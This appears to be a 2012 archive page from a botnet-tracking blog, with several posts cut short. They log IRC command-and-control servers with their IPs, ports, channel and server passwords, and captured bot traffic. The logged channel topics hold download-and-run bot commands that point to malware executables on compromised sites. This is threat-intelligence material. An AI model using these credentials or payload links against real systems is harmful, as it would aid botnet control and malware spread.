Month: February 2012

Domains used for the botnet: chicken1000.mooo.com 127.0.0.2 not active yet api.wipmania.com 199.15.234.7 fasterthanhim.com 91.226.78.31 active sad-stone.com NONE not active yet sad-stone.com.local NONE not active yet C&C Server: 91.226.78.31:8765 Server Password: Username: dxvzrjf Nickname: n{DE|XPa}dxvzrjf Channel: #GODS (Password: secret) Channeltopic: :~up http://www.emprender.edu.co/media/system/js/war.exe 24e3da41454dcbe517037d306c644245 ~mdns http://www.farmaciavirtual.com.co/pruebas/z.txt sample here and here hosting infos: http://whois.domaintools.com/91.226.78.31

Remote Host Port Number 37.59.74.224 6665 PASS google_cache2.tmp NICK new[fbe-XP-USA]286504 USER 0348 “” “TsGh” :0348 PONG :901E418A JOIN #G u12344u Now talking in #G Topic On: [ #G ] [ ] Topic By: [ inm ] Joins: [fbe-XP-YEM]541433 [5414@0wn3d-F3F21148.dynamic.yemennet.ye] Joins: [fbe-XP-SAU]731906 [4962@84EEFA9B.2199BF6.97E20028.IP] Joins: [fbe-XP-SAU]000244 [0002@37AB46F7.7A8C2D64.C25393E1.IP] Joins: [fbe-XP-SAU]737710 [7377@C250848.3BBB233E.5822195F.IP] Joins: [fbe-XP-SAU]372114 [3721@DFD745AA.8F1AA4B1.A97334FE.IP] Joins: [fbe-W7-USA]180197 [0792@4A76F5E6.CCDF15C9.3AA76D10.IP] hostingRead more...

Remote Host Port Number 213.239.195.4 2345 MODE New[USA|00|P|46215] -ix PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. JOIN #!loco! PONG 22 MOTD Channel Topic for Channel #!loco!: “.m.s|.m.e ehaha foto http://goo.gl/ymh4i?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]:Read more...

Remote Host Port Number 211.138.126.142 6532 PASS fuck3d MODE #hp# -ix PONG irc.nkworld.com NICK [00|USA|667594] USER XP-3819 * 0 :COMPUTERNAME MODE [00|USA|667594] -ix JOIN #hp# fux hosting infos: http://whois.domaintools.com/211.138.126.142

Remote Host Port Number 173.255.237.110 80 199.15.234.7 80 76.73.3.162 80 61.31.99.67 1863 PASS boss 61.31.99.67 4042 PASS boss NICK [USA|00||324811] USER xp-2815 * 0 :COMPUTERNAME MODE [USA|00||324811] -ix JOIN #new PRIVMSG #new : Now talking in #new Topic On: [ #new ] [ ] Topic By: [ chk ] hosting infos: http://whois.domaintools.com/61.31.99.67

Remote Host Port Number 46.105.232.106 1866 NICK n[USA|XP|COMPUTERNAME]pzammgy USER hh “” “lol” :hh JOIN #!h! PONG 422 Now talking in #!h! Topic On: [ #!h! ] [ ] Topic By: [ xx ] hosting infos: http://whois.domaintools.com/46.105.232.106

Domains used to control bots: pedoapestoso.info not active c4t3ring.info ramen4all.info Resolved : [c4t3ring.info] To [74.62.152.211] Resolved : [ramen4all.info] To [74.62.152.211] c4t3ring.info:6161 Botnet server here ramen4all.info:6161 Botnet server here Clients: I have 247 clients and 0 servers Local users: Current Local Users: 247 Max: 1261 Global users: Current Global Users: 247 Max: 280 PASS p3p1n0 NICKRead more...

Large ngrBot server hosted in Germany Here u have strings from 2 executable samples 30upjmrlzz.exe Processes: PID ParentPID User Path -------------------------------------------------- 2872 1236 C:Documents and SettingsMes documents30upjmrlzz.exe Ports: Port PID Type Path -------------------------------------------------- Explorer Dlls: DLL Path Company Name File Description -------------------------------------------------- No changes Found IE Dlls: DLL Path Company Name File Description -------------------------------------------------- NoRead more...